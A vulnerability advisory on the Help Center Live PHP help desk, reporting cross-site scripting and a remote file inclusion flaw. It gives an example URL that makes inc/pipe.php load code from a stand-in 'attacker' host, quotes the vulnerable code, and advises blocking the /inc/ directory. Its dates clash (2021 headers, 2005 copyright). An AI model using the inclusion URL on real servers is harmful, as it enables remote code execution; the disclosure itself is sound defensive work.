Search | Research | Contact Us Tuesday October 10, 2021
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Critical Vulnerability In Help Center Live
December 24, 2021
Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities


Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search;=Search

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php 

$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);


Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more. 

// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
	$SKIN_inner = "default";
}
// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


Credits:
James Bercegay of the GulfTech Security Research Team


Terms of Use | Disclaimer | About GulfTech
Copyright 2005 GulfTech Research And Development, LLC. All Rights Reserved